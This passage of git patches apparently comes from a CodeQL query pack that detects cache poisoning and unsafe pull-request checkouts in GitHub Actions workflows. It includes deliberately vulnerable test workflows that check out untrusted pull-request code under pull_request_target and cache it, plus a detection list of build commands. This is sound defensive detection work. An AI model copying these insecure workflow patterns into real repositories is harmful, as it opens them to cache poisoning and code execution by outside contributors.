.github/workflows/issue_comment_3rd_party_action.yml:30:9:36:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_3rd_party_action.yml:45:9:49:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From 1ea0312f362e90cb43895ae235884cc26f3684a4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 8 May 2024 22:35:25 +0200 Subject: [PATCH 257/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index f07d6c40046c..e68a4c67cc4f 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.21 +version: 0.0.22 dependencies: codeql/util: ^0.2.0 codeql/yaml: ^0.1.2 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 13f053a40da4..465be503e7c3 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.21 +version: 0.0.22 groups: - actions - queries From d6fb0ae84ed1dfd7f829fc2f4a4d6228863f05dc Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 8 May 2024 22:41:05 +0200 Subject: [PATCH 258/707] Update tests --- .../Security/CWE-349/CachePoisoning.expected | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected index 841a3ee40712..75a370246cba 100644 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected @@ -1,8 +1,8 @@ -| .github/workflows/test1.yml:13:9:18:6 | Uses Step | Untrusted checked-out code may lead to cache poisoning on step $@. | .github/workflows/test1.yml:18:9:22:6 | Uses Step | Uses Step | -| .github/workflows/test2.yml:11:9:14:6 | Uses Step | Untrusted checked-out code may lead to cache poisoning on step $@. | .github/workflows/test2.yml:14:9:18:6 | Uses Step | Uses Step | -| .github/workflows/test3.yml:11:9:14:6 | Uses Step | Untrusted checked-out code may lead to cache poisoning on step $@. | .github/workflows/test3.yml:14:9:22:6 | Uses Step | Uses Step | -| .github/workflows/test6.yml:10:9:13:6 | Uses Step | Untrusted checked-out code may lead to cache poisoning on step $@. | .github/workflows/test6.yml:13:9:17:6 | Uses Step | Uses Step | -| .github/workflows/test7.yml:10:9:13:6 | Uses Step | Untrusted checked-out code may lead to cache poisoning on step $@. | .github/workflows/test7.yml:13:9:16:6 | Uses Step | Uses Step | -| .github/workflows/test8.yml:12:9:15:6 | Uses Step | Untrusted checked-out code may lead to cache poisoning on step $@. | .github/workflows/test8.yml:15:9:17:2 | Run Step | Run Step | -| .github/workflows/test8.yml:23:9:26:6 | Uses Step | Untrusted checked-out code may lead to cache poisoning on step $@. | .github/workflows/test8.yml:26:9:28:2 | Uses Step | Uses Step | -| .github/workflows/test8.yml:34:9:37:6 | Uses Step | Untrusted checked-out code may lead to cache poisoning on step $@. | .github/workflows/test8.yml:37:9:37:75 | Run Step | Run Step | +| .github/workflows/test1.yml:13:9:18:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test1.yml:18:9:22:6 | Uses Step | Uses Step | +| .github/workflows/test2.yml:11:9:14:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test2.yml:14:9:18:6 | Uses Step | Uses Step | +| .github/workflows/test3.yml:11:9:14:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test3.yml:14:9:22:6 | Uses Step | Uses Step | +| .github/workflows/test6.yml:10:9:13:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test6.yml:13:9:17:6 | Uses Step | Uses Step | +| .github/workflows/test7.yml:10:9:13:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test7.yml:13:9:16:6 | Uses Step | Uses Step | +| .github/workflows/test8.yml:12:9:15:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test8.yml:15:9:17:2 | Run Step | Run Step | +| .github/workflows/test8.yml:23:9:26:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test8.yml:26:9:28:2 | Uses Step | Uses Step | +| .github/workflows/test8.yml:34:9:37:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test8.yml:37:9:37:75 | Run Step | Run Step | From a30c2aa5def74c81e84f2ae8eff890ca8f615e49 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 9 May 2024 23:32:21 +0200 Subject: [PATCH 259/707] Update PoisonableSteps --- .../actions/security/PoisonableSteps.qll | 26 ++++++++++++++----- 1 file changed, 19 insertions(+), 7 deletions(-) diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index f65bf5fb4dc8..070dcbda5329 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll @@ -18,8 +18,8 @@ private string dangerousCommands() { [ "npm install", "npm run ", "yarn ", "npm ci(\\b|$)", "make ", "terraform plan", "terraform apply", "gomplate ", "pre-commit run", "pre-commit install", "go generate", - "msbuild ", "mvn ", "./mvnw ", "gradle ", "./gradlew ", "bundle install", "bundle exec ", - "^ant ", "mkdocs build", "pytest" + "msbuild ", "mvn ", "gradle ", "bundle install", "bundle exec ", "^ant ", "mkdocs build", + "pytest", "pip install -r ", "pip install --requirement", "java -jar " ] } @@ -31,21 +31,33 @@ class BuildRunStep extends PoisonableStep, Run { } } +bindingset[cmdRegexp] +string wrapLocalCmd(string cmdRegexp) { result = "(^|;\\s*|\\s+)" + cmdRegexp + "(\\s+|;|$)" } + class LocalCommandExecutionRunStep extends PoisonableStep, Run { string cmd; LocalCommandExecutionRunStep() { // Heuristic: - // Run step with a command starting with `./xxxx`, `sh xxxx`, ... exists(string line | line = this.getScript().splitAt("\n").trim() | // ./xxxx - cmd = line.regexpCapture("(^|\\s+)\\.\\/(.*)", 2) + // TODO: It could also be in the form of `dir/cmd` + cmd = line.regexpCapture(wrapLocalCmd("\\.\\/(.*)"), 2) or // sh xxxx - cmd = line.regexpCapture("(^|\\s+)(ba|z|fi)?sh\\s+(.*)", 3) + cmd = line.regexpCapture(wrapLocalCmd("(ba|z|fi)?sh\\s+(.*)"), 3) + or + // node xxxx.js + cmd = line.regexpCapture(wrapLocalCmd("node\\s+(.*)(\\.js|\\.ts)"), 2) + or + // python xxxx.py + cmd = line.regexpCapture(wrapLocalCmd("python\\s+(.*)\\.py"), 2) + or + // ruby xxxx.rb + cmd = line.regexpCapture(wrapLocalCmd("ruby\\s+(.*)\\.rb"), 2) or - // node xxxx - cmd = line.regexpCapture("(^|\\s+)(node|python|ruby|go)\\s+(.*)", 3) + // go xxxx.go + cmd = line.regexpCapture(wrapLocalCmd("go\\s+(.*)\\.go"), 2) ) } From 4d612044049e206bba6f01c49c9e49937c3b33ac Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 10 May 2024 14:12:25 +0200 Subject: [PATCH 260/707] New tests --- ql/test/library-tests/test.expected | 14 ++++++++++++ .../CWE-349/.github/workflows/test13.yml | 22 +++++++++++++++++++ .../CWE-349/.github/workflows/test14.yml | 22 +++++++++++++++++++ .../CWE-349/.github/workflows/test15.yml | 22 +++++++++++++++++++ .../CWE-349/.github/workflows/test16.yml | 22 +++++++++++++++++++ .../Security/CWE-349/CachePoisoning.expected | 2 ++ 6 files changed, 104 insertions(+) create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test13.yml create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test14.yml create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test15.yml create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test16.yml diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index c735596ae053..61f7120e78e9 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected @@ -98,6 +98,10 @@ runStepChildren | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | parentNodes | .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | +| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | +| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | | .github/workflows/expression_nodes.yml:5:14:5:26 | ubuntu-latest | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | | .github/workflows/expression_nodes.yml:5:14:5:26 | ubuntu-latest | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | @@ -136,8 +140,14 @@ parentNodes | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/multiline.yml:2:3:2:14 | workflow_run | .github/workflows/multiline.yml:2:3:5:18 | workflow_run: | +| .github/workflows/multiline.yml:2:3:5:18 | workflow_run: | .github/workflows/multiline.yml:1:1:33:14 | on: | | .github/workflows/multiline.yml:3:17:3:22 | Prev | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:3:17:3:22 | Prev | .github/workflows/multiline.yml:2:3:2:14 | workflow_run | +| .github/workflows/multiline.yml:3:17:3:22 | Prev | .github/workflows/multiline.yml:2:3:5:18 | workflow_run: | | .github/workflows/multiline.yml:5:9:5:17 | completed | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:5:9:5:17 | completed | .github/workflows/multiline.yml:2:3:2:14 | workflow_run | +| .github/workflows/multiline.yml:5:9:5:17 | completed | .github/workflows/multiline.yml:2:3:5:18 | workflow_run: | | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | .github/workflows/multiline.yml:1:1:33:14 | on: | | .github/workflows/multiline.yml:9:14:9:26 | ubuntu-latest | .github/workflows/multiline.yml:1:1:33:14 | on: | | .github/workflows/multiline.yml:9:14:9:26 | ubuntu-latest | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | @@ -163,6 +173,10 @@ parentNodes | .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:30:9:33:14 | Run Step | | .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:5:1:8 | push | +| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:5:1:8 | push | +| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:5:1:8 | push | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | .github/workflows/test.yml:5:5:31:2 | Job: job1 | diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test13.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test13.yml new file mode 100644 index 000000000000..72106b9d69b5 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test13.yml @@ -0,0 +1,22 @@ +name: Cache Poisoning + +on: + pull_request_target: + branches: + - foo + +permissions: read-all + +jobs: + poison: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.sha }} + - uses: actions/cache@v2 + with: + path: ./poison + key: poison_key + - run: | + cat poison diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test14.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test14.yml new file mode 100644 index 000000000000..31c820904cdb --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test14.yml @@ -0,0 +1,22 @@ +name: Cache Poisoning + +on: + pull_request_target: + branches-ignore: + - main + +permissions: read-all + +jobs: + poison: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.sha }} + - uses: actions/cache@v2 + with: + path: ./poison + key: poison_key + - run: | + cat poison diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test15.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test15.yml new file mode 100644 index 000000000000..d3f51456de2d --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test15.yml @@ -0,0 +1,22 @@ +name: Cache Poisoning + +on: + pull_request_target: + branches: + - main + +permissions: read-all + +jobs: + poison: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.sha }} + - uses: actions/cache@v2 + with: + path: ./poison + key: poison_key + - run: | + cat poison diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test16.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test16.yml new file mode 100644 index 000000000000..ec0f9b0e6c94 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test16.yml @@ -0,0 +1,22 @@ +name: Cache Poisoning + +on: + pull_request_target: + branches-ignore: + - foo + +permissions: read-all + +jobs: + poison: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.sha }} + - uses: actions/cache@v2 + with: + path: ./poison + key: poison_key + - run: | + cat poison diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected index 75a370246cba..f0ee6d700014 100644 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected @@ -6,3 +6,5 @@ | .github/workflows/test8.yml:12:9:15:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test8.yml:15:9:17:2 | Run Step | Run Step | | .github/workflows/test8.yml:23:9:26:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test8.yml:26:9:28:2 | Uses Step | Uses Step | | .github/workflows/test8.yml:34:9:37:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test8.yml:37:9:37:75 | Run Step | Run Step | +| .github/workflows/test15.yml:14:9:17:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test15.yml:17:9:21:6 | Uses Step | Uses Step | +| .github/workflows/test16.yml:14:9:17:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test16.yml:17:9:21:6 | Uses Step | Uses Step | From 8590a0ba8fbf99e48f58d40eeb7bb33212f0a253 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 10 May 2024 14:12:54 +0200 Subject: [PATCH 261/707] Refactor runOnDefaultBranch --- .../actions/security/CachePoisoningQuery.qll | 50 +++++++++++++++++++ ql/src/Security/CWE-349/CachePoisoning.ql | 14 +----- .../CWE-349/CachePoisoningByCodeInjection.ql | 15 +----- 3 files changed, 53 insertions(+), 26 deletions(-) diff --git a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll index 9762e9d90784..5ac2a855e9f4 100644 --- a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll @@ -10,6 +10,56 @@ string defaultBranchTriggerEvent() { ] } +predicate test(Event e) { + e.getName() = "pull_request_target" and + // branches and branches-ignore filters + e.hasProperty("branches") and + e.hasProperty("branches-ignore") and + e.getAPropertyValue("branches") = ["main", "master", "default"] and + not e.getAPropertyValue("branches-ignore") = ["main", "master", "default"] +} + +predicate runsOnDefaultBranch(Job j) { + exists(Event e | + j.getATriggerEvent() = e and + ( + e.getName() = defaultBranchTriggerEvent() and + not e.getName() = "pull_request_target" + or + e.getName() = "push" and + e.getAPropertyValue("branches") = ["main", "master", "default"] + or + e.getName() = "pull_request_target" and + ( + // no filtering + not e.hasProperty("branches") and not e.hasProperty("branches-ignore") + or + // only branches-ignore filter + e.hasProperty("branches-ignore") and + not e.hasProperty("branches") and + not e.getAPropertyValue("branches-ignore") = ["main", "master", "default"] + or + // only branches filter + e.hasProperty("branches") and + not e.hasProperty("branches-ignore") and + e.getAPropertyValue("branches") = ["main", "master", "default"] + or + // branches and branches-ignore filters + e.hasProperty("branches") and + e.hasProperty("branches-ignore") and + e.getAPropertyValue("branches") = ["main", "master", "default"] and + not e.getAPropertyValue("branches-ignore") = ["main", "master", "default"] + ) + ) + ) + or + j.getATriggerEvent().getName() = "workflow_call" and + exists(ExternalJob call | + call.getCallee() = j.getLocation().getFile().getRelativePath() and + runsOnDefaultBranch(call) + ) +} + abstract class CacheWritingStep extends Step { } class CacheActionUsesStep extends CacheWritingStep, UsesStep { diff --git a/ql/src/Security/CWE-349/CachePoisoning.ql b/ql/src/Security/CWE-349/CachePoisoning.ql index 7bcbe693566c..11da318f474d 100644 --- a/ql/src/Security/CWE-349/CachePoisoning.ql +++ b/ql/src/Security/CWE-349/CachePoisoning.ql @@ -21,19 +21,7 @@ where // Excluding privileged workflows since they can be easily exploited in similar circumstances not j.isPrivileged() and // The workflow runs in the context of the default branch - // TODO: (require to collect trigger types) - // - add push to default branch? - // - exclude pull_request_target when branches_ignore includes default branch or when branches does not include the default branch - ( - j.getEnclosingWorkflow().hasTriggerEvent(defaultBranchTriggerEvent()) - or - j.getEnclosingWorkflow().hasTriggerEvent("workflow_call") and - exists(ExternalJob call, Workflow caller | - call.getCallee() = j.getLocation().getFile().getRelativePath() and - caller = call.getWorkflow() and - caller.hasTriggerEvent(defaultBranchTriggerEvent()) - ) - ) and + runsOnDefaultBranch(j) and // The job checkouts untrusted code from a pull request j.getAStep() = checkout and ( diff --git a/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql b/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql index e02b64e9ec5a..5d739d746d50 100644 --- a/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql +++ b/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql @@ -21,21 +21,10 @@ from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink, Local where CodeInjectionFlow::flowPath(source, sink) and j = sink.getNode().asExpr().getEnclosingJob() and + // Excluding privileged workflows since they can be easily exploited in similar circumstances not j.isPrivileged() and // The workflow runs in the context of the default branch - // TODO: (require to collect trigger types) - // - add push to default branch? - // - exclude pull_request_target when branches_ignore includes default branch or when branches does not include the default branch - ( - j.getEnclosingWorkflow().hasTriggerEvent(defaultBranchTriggerEvent()) - or - j.getEnclosingWorkflow().hasTriggerEvent("workflow_call") and - exists(ExternalJob call, Workflow caller | - call.getCallee() = j.getLocation().getFile().getRelativePath() and - caller = call.getWorkflow() and - caller.hasTriggerEvent(defaultBranchTriggerEvent()) - ) - ) + runsOnDefaultBranch(j) select sink.getNode(), source, sink, "Unprivileged code injection in $@, which may lead to cache poisoning.", sink, sink.getNode().asExpr().(Expression).getRawExpression() From e0d147f39acdfb2d579a85417dea02af73e065f6 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 10 May 2024 14:13:44 +0200 Subject: [PATCH 262/707] Add On and Event AST nodes Capture information about trigger events on the new On and Event classes --- ql/lib/codeql/actions/Ast.qll | 24 +++-- ql/lib/codeql/actions/ast/internal/Ast.qll | 93 +++++++++++++++---- .../CodeExecutionOnSelfHostedRunner.ql | 2 +- 3 files changed, 96 insertions(+), 23 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 5daa99d142ee..1e57c8f3d29d 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -254,13 +254,13 @@ class Workflow extends AstNode instanceof WorkflowImpl { Job getJob(string jobId) { result = super.getJob(jobId) } - predicate hasTriggerEvent(string trigger) { super.hasTriggerEvent(trigger) } - - string getATriggerEvent() { result = super.getATriggerEvent() } + Event getATriggerEvent() { result = super.getATriggerEvent() } Permissions getPermissions() { result = super.getPermissions() } Strategy getStrategy() { result = super.getStrategy() } + + On getOn() { result = super.getOn() } } class ReusableWorkflow extends Workflow instanceof ReusableWorkflowImpl { @@ -305,6 +305,20 @@ class Needs extends AstNode instanceof NeedsImpl { Job getANeededJob() { result = super.getANeededJob() } } +class On extends AstNode instanceof OnImpl { + Event getAnEvent() { result = super.getAnEvent() } +} + +class Event extends AstNode instanceof EventImpl { + string getName() { result = super.getName() } + + string getAnActivityType() { result = super.getAnActivityType() } + + string getAPropertyValue(string prop) { result = super.getAPropertyValue(prop) } + + predicate hasProperty(string prop) { super.hasProperty(prop) } +} + /** * An Actions job within a workflow. * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobs. @@ -328,9 +342,7 @@ abstract class Job extends AstNode instanceof JobImpl { Permissions getPermissions() { result = super.getPermissions() } - predicate hasTriggerEvent(string trigger) { super.hasTriggerEvent(trigger) } - - string getATriggerEvent() { result = super.getATriggerEvent() } + Event getATriggerEvent() { result = super.getATriggerEvent() } Strategy getStrategy() { result = super.getStrategy() } diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index fca9298794f7..e8a92a411423 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -68,6 +68,16 @@ private newtype TAstNode = TStrategyNode(YamlMapping n) { exists(YamlMapping m | m.lookup("strategy") = n) } or TNeedsNode(YamlMappingLikeNode n) { exists(YamlMapping m | m.lookup("needs") = n) } or TJobNode(YamlMapping n) { exists(YamlMapping w | w.lookup("jobs").(YamlMapping).lookup(_) = n) } or + TOnNode(YamlMappingLikeNode n) { exists(YamlMapping w | w.lookup("on") = n) } or + TEventNode(YamlScalar event, YamlMappingLikeNode n) { + exists(OnImpl o | + o.getNode().(YamlMapping).maps(event, n) + or + o.getNode().(YamlSequence).getAChildNode() = event and event = n + or + o.getNode().(YamlScalar) = n and event = n + ) + } or TStepNode(YamlMapping n) { exists(YamlMapping m | m.lookup("steps").(YamlSequence).getElementNode(_) = n) } or @@ -308,6 +318,9 @@ class WorkflowImpl extends AstNodeImpl, TWorkflowNode { override YamlMapping getNode() { result = n } + /** Gets the `on` trigger events for this workflow. */ + OnImpl getOn() { result.getNode() = n.lookup("on") } + /** Gets the 'global' `env` mapping in this workflow. */ EnvImpl getEnv() { result.getNode() = n.lookup("env") } @@ -323,15 +336,8 @@ class WorkflowImpl extends AstNodeImpl, TWorkflowNode { /** Gets the permissions granted to this workflow. */ PermissionsImpl getPermissions() { result.getNode() = n.lookup("permissions") } - /** Workflow is triggered by given trigger event */ - predicate hasTriggerEvent(string trigger) { - exists(YamlNode y | y = n.lookup("on").(YamlMappingLikeNode).getNode(trigger)) - } - /** Gets the trigger event that starts this workflow. */ - string getATriggerEvent() { - exists(YamlNode y | y = n.lookup("on").(YamlMappingLikeNode).getNode(result)) - } + EventImpl getATriggerEvent() { this.getOn().getAnEvent() = result } /** Gets the strategy for this workflow. */ StrategyImpl getStrategy() { result.getNode() = n.lookup("strategy") } @@ -573,6 +579,66 @@ class NeedsImpl extends AstNodeImpl, TNeedsNode { } } +class OnImpl extends AstNodeImpl, TOnNode { + YamlMappingLikeNode n; + + OnImpl() { this = TOnNode(n) } + + override string toString() { result = n.toString() } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + override WorkflowImpl getParentNode() { result.getAChildNode() = this } + + override string getAPrimaryQlClass() { result = "OnImpl" } + + override Location getLocation() { result = n.getLocation() } + + override YamlMappingLikeNode getNode() { result = n } + + /** Gets an event that triggers the workflow. */ + EventImpl getAnEvent() { result.getParentNode() = this } +} + +class EventImpl extends AstNodeImpl, TEventNode { + YamlScalar e; + YamlMappingLikeNode n; + + EventImpl() { this = TEventNode(e, n) } + + override string toString() { result = e.getValue() } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + override OnImpl getParentNode() { result.getAChildNode() = this } + + override string getAPrimaryQlClass() { result = "EventImpl" } + + override Location getLocation() { result = e.getLocation() } + + override YamlScalar getNode() { result = e } + + /** Gets the name of the event that triggers the workflow. */ + string getName() { result = e.getValue() } + + /** Gets the Yaml Node associated with the event if any */ + YamlMappingLikeNode getValueNode() { result = n } + + /** Gets an activity type */ + string getAnActivityType() { + result = + n.(YamlMapping).lookup("types").(YamlMappingLikeNode).getNode(_).(YamlScalar).getValue() + } + + /** Gets a string value for any property (eg: branches, branches-ignore, etc.) */ + string getAPropertyValue(string prop) { + result = n.(YamlMapping).lookup(prop).(YamlMappingLikeNode).getNode(_).(YamlScalar).getValue() + } + + /** Holds if the event has a property with the given name */ + predicate hasProperty(string prop) { exists(this.getAPropertyValue(prop)) } +} + class JobImpl extends AstNodeImpl, TJobNode { YamlMapping n; string jobId; @@ -686,7 +752,7 @@ class JobImpl extends AstNodeImpl, TJobNode { // For workflows that are triggered by the pull_request_target event, the GITHUB_TOKEN is granted read/write repository permission unless the permissions key is specified and the workflow can access secrets, even when it is triggered from a fork. // The Job is triggered by an event other than `pull_request` count(this.getATriggerEvent()) = 1 and - not this.getATriggerEvent() = ["pull_request", "workflow_call"] + not this.getATriggerEvent().getName() = ["pull_request", "workflow_call"] or // The Workflow is only triggered by `workflow_call` and there is // a caller workflow triggered by an event other than `pull_request` @@ -701,16 +767,11 @@ class JobImpl extends AstNodeImpl, TJobNode { count(this.getATriggerEvent()) > 1 } - /** Workflow is triggered by given trigger event */ - predicate hasTriggerEvent(string trigger) { - exists(YamlNode y | y = n.lookup("on").(YamlMappingLikeNode).getNode(trigger)) - } - /** Gets the trigger event that starts this workflow. */ - string getATriggerEvent() { result = this.getEnclosingWorkflow().getATriggerEvent() } + EventImpl getATriggerEvent() { result = this.getEnclosingWorkflow().getATriggerEvent() } private predicate hasSingleTrigger(string trigger) { - this.getATriggerEvent() = trigger and + this.getATriggerEvent().getName() = trigger and count(this.getATriggerEvent()) = 1 } diff --git a/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql b/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql index c7bdfbbc323c..90997f63631c 100644 --- a/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql +++ b/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql @@ -21,7 +21,7 @@ import codeql.actions.dataflow.ExternalFlow */ predicate staticallyIdentifiedSelfHostedRunner(Job job) { exists(string label | - job.getEnclosingWorkflow().getATriggerEvent() = + job.getEnclosingWorkflow().getATriggerEvent().getName() = ["pull_request", "pull_request_review", "pull_request_review_comment", "pull_request_target"] and label = job.getARunsOnLabel() and // source: https://github.com/boostsecurityio/poutine/blob/main/opa/rego/poutine/utils.rego#L49C3-L49C136 From 510cefecbe1e678bb6be20fc5baa7310a38a2a42 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 10 May 2024 14:59:12 +0200 Subject: [PATCH 263/707] Remove debug left-overs --- .../actions/security/CachePoisoningQuery.qll | 19 ++++++------------- 1 file changed, 6 insertions(+), 13 deletions(-) diff --git a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll index 5ac2a855e9f4..ab0f2d0809a7 100644 --- a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll @@ -10,14 +10,7 @@ string defaultBranchTriggerEvent() { ] } -predicate test(Event e) { - e.getName() = 